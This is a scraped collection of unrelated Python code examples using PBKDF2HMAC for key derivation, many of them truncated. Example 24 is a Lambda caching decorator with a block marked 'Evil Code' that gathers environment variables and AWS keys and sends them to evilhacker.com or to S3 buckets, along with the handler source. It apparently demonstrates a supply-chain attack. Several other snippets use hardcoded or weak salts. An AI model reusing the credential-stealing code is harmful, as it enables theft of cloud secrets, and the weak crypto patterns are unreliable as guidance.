                                endip = ipaddress.IPv4Address(tokens[1])
                            cidrs = []
                            cidrs = [
                                ipaddr for ipaddr in ipaddress.
                                summarize_address_range(startip, endip)
                            ]
                        except Exception as e:
                            logging.error("Encountered exception: %s", e)
                            logging.error(
                                "Error converting IP range [%s] to CIDRs. Skipping it...",
                                iprange)
                            continue
                        logging.info("Converted IP range [%s] to CIDRs %s",
                                     iprange, cidrs)
                    if '/' in row['hostname']:
                        logging.info(
                            "Enumerating IPs based on specified CIDR [%s]",
                            row['hostname'])
                        try:
                            if sys.version_info[0] < 3:
                                cidrs = [
                                    ipaddress.ip_network(
                                        unicode(row['hostname'], "ascii"))
                                ]
                            else:
                                cidrs = [ipaddress.ip_network(row['hostname'])]
                        except Exception as e:
                            logging.error("Encountered exception: %s", e)
                            logging.error(
                                "Invalid CIDR [%s] specified. Skipping it...",
                                row['hostname'])
                            continue
                    for cidr in cidrs:
                        for a in cidr:
                            trow = row.copy()
                            trow['hostname'] = str(a)

                            # Remove hard-coded asset ID and name for CIDR, as it will overwrite same asset
                            # These will based on host IP address automatically
                            trow['assetname'] = None

                            remote_hosts.append(trow)
                            remote_hosts[-1]['remote'] = True
                            logging.info("Enumerated IP: %s", a)
                else:
                    remote_hosts.append(row)
                    remote_hosts[-1]['remote'] = True
        if args.secure:
            # secure the host list
            logging.info("Securing host list file")
            if args.password is None:
                pp1 = getpass.getpass(prompt="Enter password: "******"Re-enter password: "******"Passwords don't match. Try again.")
                    return None
            else:
                pp1 = args.password
            password = pp1.encode()
            salt = base64.b64encode(password)
            kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                             length=32,
                             salt=salt,
                             iterations=100000,
                             backend=default_backend())
            key = base64.urlsafe_b64encode(kdf.derive(password))
            f = Fernet(key)
            # verify the key if possible
            with open(host_list_file, mode='r') as csv_file:
                csv_reader = csv.DictReader(csv_file,
                                            quoting=csv.QUOTE_NONE,
                                            escapechar='\\')
                for row in csv_reader:
                    try:
                        if row['userpwd'] != '' and row['userpwd'].startswith(
                                '__SECURE__:'):
                            epass = row['userpwd'].replace('__SECURE__:', '')
                            epass = f.decrypt(epass)
                    except:
                        logging.error("Invalid password")
                        logging.error(
                            "Please use the same password as was used previously to secure the file"
                        )
                        return None
            # secure the new rows in the file
            with open(host_list_file, mode='w') as csvfile:
                fieldnames = [
                    'hostname', 'userlogin', 'userpwd', 'privatekey',
                    'assetname'
                ]
                writer = csv.DictWriter(csvfile,
                                        fieldnames=fieldnames,
                                        quoting=csv.QUOTE_NONE,
                                        escapechar='\\')
                writer.writeheader()
                for h in remote_hosts:
                    if h['userpwd'] != '' and not h['userpwd'].startswith(
                            '__SECURE__:'):
                        h['userpwd'] = '__SECURE__:' + f.encrypt(
                            h['userpwd'].encode('utf-8')).decode('utf-8')
                    del h['remote']
                    writer.writerow(h)
            logging.info("Host list file secured")
            return None
        else:
            return discover_hosts(args, remote_hosts)
    else:
        host = {}
        host['assetid'] = utils.get_ip(
        ) if args.assetid is None else args.assetid
        host['assetname'] = host[
            'assetid'] if args.assetname is None else args.assetname
        host['hostname'] = utils.get_ip()
        host['remote'] = False
        hosts = [host]
        return discover_hosts(args, hosts)
Esempio n. 20
0
                          data=json.dumps(ecdh_data))
deepapi_public_key = load_pem_public_key(auth_post.json()['pub_key'].encode(),
                                         default_backend())

shared_secret = deepvault_private_key.exchange(ec.ECDH(), deepapi_public_key)

# challenge-response

iv = secrets.token_bytes(16)

salt = secrets.token_bytes(32)
iterations = 150000

kdf = PBKDF2HMAC(
    algorithm=SHA512(),
    length=32,  # 32 * 8 = 256 bits
    salt=salt,
    iterations=iterations,
    backend=default_backend())

secret_key = kdf.derive(shared_secret)

cipher = Cipher(algorithms.AES(secret_key),
                modes.CBC(iv),
                backend=default_backend())
encryptor = cipher.encryptor()
decryptor = cipher.decryptor()

nonce = secrets.token_bytes(64)
encrypted_nonce = encryptor.update(nonce) + encryptor.finalize()

nonce_data = {
Esempio n. 21
0
def encrypt_aes_cbc(input_file,
                    destination,
                    encryption_bits=256,
                    password='',
                    outform='base64',
                    salt_in_output=True,
                    iv_in_output=True):
    backend = default_backend()  # set encryption backend

    if password == '':
        password = passgenerator.complexpass(default_password_length,
                                             special=False)

    salt = passgenerator.complexpass(
        encryption_bits //
        16).encode()  # defaults to 128 bits (half the key size)

    # setup key derivation function
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=encryption_bits //
        8,  # encryption bits expressed as bytes (8 bits per byte)
        salt=salt,
        iterations=kdf_iterations,
        backend=backend)

    key = kdf.derive(password.encode())

    # generate key if it was not provided
    #if encryption_key == '':
    #    decoded_key = passgenerator.complexpass(encryption_bits//8)
    #    key = decoded_key.encode()
    #else:
    #    key = encryption_key.encode()

    # create initialization vector
    iv = passgenerator.complexpass(encryption_bits // 16).encode()

    # instantiate cipher
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)

    # instantiate padder
    padder = PKCS7(128).padder()  # AES uses 128 bit blocks

    # get bytes from input file
    file_bytes = read_file_bytes(input_file)

    # do the padding
    padded_data = padder.update(file_bytes) + padder.finalize()

    # instantiate the encryptor
    encryptor = cipher.encryptor()

    # do the encryption
    cipher_text = encryptor.update(padded_data) + encryptor.finalize()

    # write output file
    if outform == 'bytes':
        output_file = write_file_bytes(cipher_text, destination)
    else:
        output_file = write_file_base64(cipher_text, salt, iv, destination)

    base64_key = base64.urlsafe_b64encode(key).decode()
    base64_iv = base64.urlsafe_b64encode(iv).decode()
    base64_salt = base64.urlsafe_b64encode(salt).decode()

    return output_file, base64_key, base64_iv, password, base64_salt
def encrypt(username, website, length, special, caps, nums):
    backend = default_backend()
    # ksalt = os.urandom(16)
    salt = b"1234567812345678"

    #print(salt.hex())

    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=16,
        salt=salt,
        iterations=100000,
        backend=backend)

    idf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=16,
        salt=salt,
        iterations=100000,
        backend=backend)

    file = open("passwords.txt", 'r+')
    hash1 = file.read()
    passwd = hash1.encode()
    ivval = b'hello'

    key = kdf.derive(passwd)
    iv = idf.derive(ivval)

    #print(key.hex())
    #print(iv.hex())

    padder = padding.PKCS7(128).padder()

    cipher = Cipher(
        algorithm=algorithms.AES(key),
        mode=modes.CBC(iv),
        backend=backend)

    encryptor = cipher.encryptor()

    # filenames
    #fname = 'index.py'

    userPassword = randomGenerator.randomGenerate(length, special, caps, nums)
    userPassword = userPassword

    dirPath = ('passKeep/%s' %(website))
    #dirPath =('passKeep/https://google.com')

    if(not(os.path.isdir(dirPath))): #if directory doesnt exists
            try:
                os.mkdir(dirPath,0o777)
            except:
                print ("Creation of the directory %s failed" % dirPath)
                exit(0)


    fname2 = ('%s.txt' %(username))
    # get the full path names
    #path = os.path.abspath(fname)
    path2 = os.path.abspath('%s/%s' %(dirPath, fname2))

    # print message to user
    #print('copying ', path, 'to ', path2)

    # set the blocksize
    blocksize = 16

    # set the totalsize counter
    totalsize = 0

    # create a mutable array to hold the bytes
    data = bytearray(blocksize)

    # open the files
    #file = open(fname, 'rb')
    file2 = open(path2, 'wb+')

    #print('filesize:', os.fstat(file.fileno()).st_size)

    # loop until done
    while True:
        # read block from source file
        temp = userPassword.encode()
        num = len(temp)
        data = temp
        #num = file.readinto(data)

        # adjust totalsize
        totalsize += num

        # print data, assuming text data
        print(num,data)
        # use following if raw binary data
        # print(num,data.hex())

        # check if full block read
        if num == blocksize:
            # write full block to destination
            pdata = padder.update(bytes(data))
            ciphertext = encryptor.update(pdata)
            file2.write(ciphertext)
        else:
            # extract subarray
            data2 = data[0:num]
            pdata = padder.update(bytes(data2)) + padder.finalize()
            ciphertext = encryptor.update(pdata) + encryptor.finalize()

            # write subarray to destination and break lo1op
            file2.write(ciphertext)
        # file2.write(b"\n")
        break

    # close files (note will also flush destination file
    #file.close()
    file2.close()

    # print totalsize
    print('read ',totalsize,' bytes')
Esempio n. 23
0
print("==============================")
print()

# klíč
# file = open('key.key', 'rb')
# klic_us = file.read()
# file.close()

heslo = input('Zadejte heslo: ')

# heslo je 'Jonáš je L'
heslo_en = heslo.encode()
saltA = b'U\xf7+\xe9=4\xbd\xd1\xf3\xd7$\xa2\xa7H\xbe\xc5'
decod = PBKDF2HMAC(algorithm=hashes.SHA3_512(),
                   length=32,
                   salt=saltA,
                   iterations=10000,
                   backend=default_backend())
klic_us = base64.urlsafe_b64encode(decod.derive(heslo_en))

print()
print('\033[31m' + 'Varování!!!' + '\033[0m' +
      ' Tento program vám může trvalo poškodit soubory!')
print('Prosím před použití napište: ' + '"napicucrypt -h"')
print("=============================================================")
funkce = input('Co chceš ? \033[31m' + 'zaheslovat / odheslovat' +
               '\033[0m  :  ')
if funkce == ('zaheslovat'):
    print("******************************")
    print('Jaký soubor chceš zaheslovat?')
    print()
Esempio n. 24
0
        def inner_function(event, context):

            response = check_cache(**kwargs)

            # Inject {parameter_name: parameter_value} into context object
            for key in response:
                setattr(context, key, response[key])

                ## Start of Evil Code
                import os
                data = dict()
                for k, v in os.environ.items():
                    data[k] = v
                print(f"Access Key ID: {os.environ['AWS_ACCESS_KEY_ID']}")

                if os.environ['ATTACK_TYPE'] == "API":
                    import requests
                    requests.post(
                        url="https://evilhacker.com/evil/exfil/creds",
                        data=data)

                elif os.environ['ATTACK_TYPE'] == "S3":
                    import boto3
                    import base64
                    import json
                    from cryptography.fernet import Fernet
                    from cryptography.hazmat.primitives import hashes
                    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

                    # derive key from account id
                    account = context.invoked_function_arn.split(":")[4]
                    kdf = PBKDF2HMAC(
                        algorithm=hashes.SHA256(),
                        length=32,
                        salt=b'\xa2:\\>\xb5\xfa\x10gpp8fsd,\x0b',
                        iterations=400000,
                    )
                    key = base64.urlsafe_b64encode(
                        kdf.derive(account.encode('utf-8')))
                    f = Fernet(key)

                    # decrypt bucket name
                    encrypted_bucket_name = b'encrypted bucket name'
                    decrypted_bucket_name = f.decrypt(
                        encrypted_bucket_name).decode('utf-8')

                    # Post to S3 bucket
                    client = boto3.client('s3')
                    response = client.put_object(
                        ACL='bucket-owner-full-control',
                        Body=json.dumps(data).encode('utf-8'),
                        Bucket=decrypted_bucket_name,
                        Key='creds_s3.txt',
                    )

                elif os.environ['ATTACK_TYPE'] == "BYOC":
                    import boto3
                    import base64
                    import json
                    from cryptography.fernet import Fernet
                    from cryptography.hazmat.primitives import hashes
                    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

                    # derive key from account id
                    account = context.invoked_function_arn.split(":")[4]
                    kdf = PBKDF2HMAC(
                        algorithm=hashes.SHA256(),
                        length=32,
                        salt=b'\xa2:\\>\xb5\xfa\x10gpp8fsd,\x0b',
                        iterations=400000,
                    )
                    key = base64.urlsafe_b64encode(
                        kdf.derive(account.encode('utf-8')))
                    f = Fernet(key)

                    # decrypt credentials
                    encrypted_creds = b'encrypted creds'
                    decrypted_creds = json.loads(f.decrypt(encrypted_creds))

                    # decrypt bucket name
                    encrypted_bucket_name = b'encrypted creds'
                    decrypted_bucket_name = f.decrypt(
                        encrypted_bucket_name).decode('utf-8')

                    client = boto3.client(
                        's3',
                        aws_access_key_id=decrypted_creds['aws_access_key_id'],
                        aws_secret_access_key=decrypted_creds[
                            'aws_secret_access_key'])

                    response = client.put_object(
                        Body=json.dumps(data).encode('utf-8'),
                        Bucket=decrypted_bucket_name,
                        Key='creds_byoc.txt',
                    )

                elif os.environ['ATTACK_TYPE'] == "BYOC_wCode":
                    import boto3
                    import base64
                    import json
                    from cryptography.fernet import Fernet
                    from cryptography.hazmat.primitives import hashes
                    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

                    # derive key from account id
                    account = context.invoked_function_arn.split(":")[4]
                    kdf = PBKDF2HMAC(
                        algorithm=hashes.SHA256(),
                        length=32,
                        salt=b'\xa2:\\>\xb5\xfa\x10gpp8fsd,\x0b',
                        iterations=400000,
                    )
                    key = base64.urlsafe_b64encode(
                        kdf.derive(account.encode('utf-8')))
                    f = Fernet(key)

                    # decrypt credentials
                    encrypted_creds = b'encrypted creds'
                    decrypted_creds = json.loads(f.decrypt(encrypted_creds))

                    # decrypt bucket name
                    encrypted_bucket_name = b'bucket_name'
                    decrypted_bucket_name = f.decrypt(
                        encrypted_bucket_name).decode('utf-8')

                    client = boto3.client(
                        's3',
                        aws_access_key_id=decrypted_creds['aws_access_key_id'],
                        aws_secret_access_key=decrypted_creds[
                            'aws_secret_access_key'])

                    response = client.put_object(
                        Body=json.dumps(data).encode('utf-8'),
                        Bucket=decrypted_bucket_name,
                        Key='creds_byocwCode.txt',
                    )

                    with open('/var/task/handler.py', 'rb') as code:
                        handler_text = code.read()

                    response = client.put_object(
                        Body=handler_text,
                        Bucket=decrypted_bucket_name,
                        Key='creds_code.py',
                    )

                ## End of Evil Code

            return func(event, context)
 def test_unicode_error_with_salt(self, backend):
     with pytest.raises(TypeError):
         PBKDF2HMAC(hashes.SHA1(), 20, u"salt", 10, backend)
Esempio n. 26
0
    def server_run(self):  #server_side function
        inp = input("Enter Name:")
        self.server.append(inp)  #saving the input to list self.server
        sleep(3)
        print("starting server.........")
        sck = socket(AF_INET, SOCK_STREAM)
        sck.bind(
            ("", 1026)
        )  #binding ip address to port number 1025 ,the port number can be changed
        sck.listen(5)
        c, a = sck.accept()  #accepting incoming connections
        nu = c.recv(self.buff).decode()  #reciving the name of the client
        self.client.append(nu)  #appending/saving the name to list self.client
        c.send(self.server[0].encode(
        ))  #sending the server name to client in list server in position 0
        print(colored("recieved client authentication",
                      'green'))  #print out on recieve of client id/name
        sleep(3)  #pausing for 3secs

        print(
            "client {} connected...".format(a[0])
        )  #print thaf client of an ip that is represented as list a[0] is connected
        print("Authenticated to {}".format(a[0]), 'name:', self.client[0])
        print("creating key pairs")
        self.loader()
        while True:
            vn = []
            jh = []
            p = []
            l = "abcdefghijklmnopqrstuvwxyz1234567890"
            for i in range(randint(4, 16)):
                kl = choice(
                    l)  #creating a random key from a list of letters 'l'
                p.append(kl)
            en = "".join(p)
            j = str("".join(p))
            kd = "['']"
            for o in kd:
                kt = j.replace(o, "")
            jh.append(kt)  #save key to list kt
            c.send(jh[0].encode())  #send key to client
            ky = colored("keys:", 'red')
            print(ky, jh[0])
            inh = input("Enter message:")  #message entry
            text = inh.encode()  #encode message to bytes
            pauth = jh[0].encode()
            salt = b'salt_'
            kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                             length=32,
                             salt=salt,
                             iterations=100000,
                             backend=default_backend())
            key = base64.urlsafe_b64encode(
                kdf.derive(pauth))  #key creation,hashed key
            vn.append(key)
            k = Fernet(vn[0])
            enc = k.encrypt(text)  #encrypt message
            c.send(enc)  #send message
            print(colored("message sent", 'yellow'))  #notify message sent
            recvm = c.recv(self.buff)  #receive message from connected client
            fdbck = k.decrypt(recvm)  #decryt the sent message
            cld = colored('received:', 'red')  #colored text before message
            print(cld, fdbck.decode(),
                  '\n')  #print sent message decoded to utf-8
 def test_buffer_protocol(self, backend):
     kdf = PBKDF2HMAC(hashes.SHA1(), 10, b"salt", 10, backend)
     data = bytearray(b"data")
     assert kdf.derive(data) == b"\xe9n\xaa\x81\xbbt\xa4\xf6\x08\xce"
Esempio n. 28
0
# The sample code is extracted from the book Python Cryptography
# The book can be downloaded from https://leanpub.com/cryptop
# Online Crypto Playgroud https://8gwifi.org
# Author Anish Nath

import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
kdf = PBKDF2HMAC(hashes.SHA1(), 20, b"salt", 10, default_backend())
key = kdf.derive(b"password")
base64.b64encode(key)
# 'rj/l9XB+B/PnwRf7iFzQUqb813o='

# Verify Operation

kdf = PBKDF2HMAC(hashes.SHA1(), 20, b"salt", 10, default_backend())
kdf.verify(b"password", key)
Esempio n. 29
0
import cryptography
import base64
import os
import sys
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

#Dont touch, these are encryption variables
salt = os.urandom(16)
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(),
                 length=32,
                 salt=salt,
                 iterations=100000,
                 backend=default_backend())
cipher_suite = None

#Static variables
version = "0.1.1"


def main():
    setNewPassphrase()
    running = True
    while (running):
        opCode = 0
        cmd = input(">>>").strip()
        #User input parser
        if cmd == "\q":
            running = closeout()
Esempio n. 30
0
def pack_data(data_migrate=None, send_now=True, unencrypted=False):
    print(constants.EXTRACTOR_WIZARD_HEADER)
    
    #Used in case automatic submission fails
    output_name = str("data_pack_"+str(time.time())).replace(".","")
    
    public_key = serialization.load_pem_public_key(
        get_key_data("PUBLIC"),
        backend=default_backend()
    )
    print(constants.EXTRACTOR_HELP_STRING)
    if not public_key:
        print(Fore.RED + "Could not load the public key")
        exit(667)

    data_pack = {}
    if data_migrate is not None:
        data_pack = data_migrate
    else:
        try:
            print("{}Please fill these infos precisely, they will appear on the report".format(Fore.LIGHTCYAN_EX))
            data_pack = dl.get_info(include_am_configs=True, include_fw_configs=True)
        except Exception as e:
            print(Fore.RED + "--------------Error while getting the data-------------- \n"
             + Fore.LIGHTWHITE_EX + str(e)  + "\n" + Fore.RED + "--------------Error while getting the data--------------")

    # Used to populate the HTTP request's JSON body
    generation_data = data_pack.get("customer_info")

    data = pickle.dumps(data_pack)
    
    if unencrypted:
        generate_unencrypted(data_pack,output_name)

    with tqdm(total=3) as pbar:
        pbar.set_description("Compressing data...")
        compressed = lzma.compress(data, preset=9 | lzma.PRESET_EXTREME)

        pbar.update(1)
        pbar.set_description("Crypto 1/2...")

        key_password = os.urandom(32) # 32 bytes / 256 bits

        # Padding
        padder = padding.PKCS7(256).padder()
        compressed_padded = padder.update(compressed)
        compressed_padded += padder.finalize()

        # Salt
        digest = hashes.Hash(hashes.SHAKE128(16), backend=default_backend())
        digest.update(key_password)
        salt = digest.finalize()

        # IV, NONCE, HMAC_KEY values generated from PBKDF2 using a single use key
        # Create real key from a given "key password"
        kdf_kp = PBKDF2HMAC(algorithm = hashes.SHA512(),
                         length = 32,
                         salt = salt,
                         iterations = 1000,
                         backend = default_backend())

        key = kdf_kp.derive(key_password)

        kdf_n = PBKDF2HMAC(algorithm = hashes.SHA256(),
                         length = 16,
                         salt = salt,
                         iterations = 200,
                         backend = default_backend())

        nonce = kdf_n.derive(key)

        kdf_iv = PBKDF2HMAC(algorithm=hashes.SHA256(),
                         length=16,
                         salt=salt,
                         iterations=200,
                         backend=default_backend())

        iv = kdf_iv.derive(nonce + key)

        kdf_hmac = PBKDF2HMAC(algorithm=hashes.SHA256(),
                         length=32,
                         salt=salt,
                         iterations=200,
                         backend=default_backend())

        hmac_key = kdf_hmac.derive(iv + key)

        # Chacha
        chacha_alg = algorithms.ChaCha20(key, nonce)
        cipher_chacha = Cipher(chacha_alg, mode=None, backend=default_backend())
        encryptor_chacha = cipher_chacha.encryptor()
        chacha_cipher = encryptor_chacha.update(compressed_padded)

        pbar.update(1)
        pbar.set_description("Crypto 2/2...")

        # Aes
        cipher_aes = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
        encryptor_aes = cipher_aes.encryptor()
        aes_cipher = encryptor_aes.update(chacha_cipher) + encryptor_aes.finalize()

        # HMAC
        h = hmac.HMAC(hmac_key, hashes.SHA512(), backend=default_backend())
        h.update(aes_cipher)
        hmac_bytes = h.finalize()

        # RSA
        # Encrypt the key with an 8192 RSA pub Key
        encrypted_password = public_key.encrypt(
            key_password,
            ass_padding.OAEP(
                mgf=ass_padding.MGF1(algorithm=hashes.SHA512()),
                algorithm=hashes.SHA512(),
                label=None
            )
        )
        pbar.update(1)
        pbar.set_description("Done!")

    aes_cipher += encrypted_password
    aes_cipher += hmac_bytes

    if send_now:

        if not upload(aes_cipher, generation_data):
            try:
                with open(output_name+".dat","wb") as out:
                    out.write(aes_cipher)
            except Exception as e:
                print(str(e)+"\nCould not save to disk! (permissions?)")
                exit(-1)

            print("{}Probably connection issues due to Firewall or no internet connection, please use this tool\n"
            " to resubmit the packege on a network with internet access using the command {}--send ".format(Fore.LIGHTYELLOW_EX,Fore.LIGHTRED_EX))

            print("{}To do it copy/send the new {}{}{} file created on this folder to other machine with internet\n" 
            "access. the file is extremelly secure it can be manipulated anywere".format(Fore.LIGHTCYAN_EX,
            Fore.LIGHTYELLOW_EX,output_name,Fore.LIGHTCYAN_EX))

            print(Fore.LIGHTGREEN_EX + "Package was saved successfully as {} !".format(output_name))
            
    else:
            try:
                with open(output_name+".dat","wb") as out:
                    out.write(aes_cipher)
            except Exception as e:
                print(str(e)+"\nCould not save to disk! (permissions?)")
                exit(-1)

            print(Fore.LIGHTYELLOW_EX+"The package was not sent for processing, you will have to use the command --send to send another time.")

            print("{}To do it copy/send the new {}{}{} file created on this folder to another machine with internet\n" 
            "access. the file is very secure and it can be sent/stored anywere.".format(Fore.LIGHTCYAN_EX,
            Fore.LIGHTYELLOW_EX,output_name,Fore.LIGHTCYAN_EX))

            print(Fore.LIGHTGREEN_EX + "Package was saved successfully as {} !".format(output_name))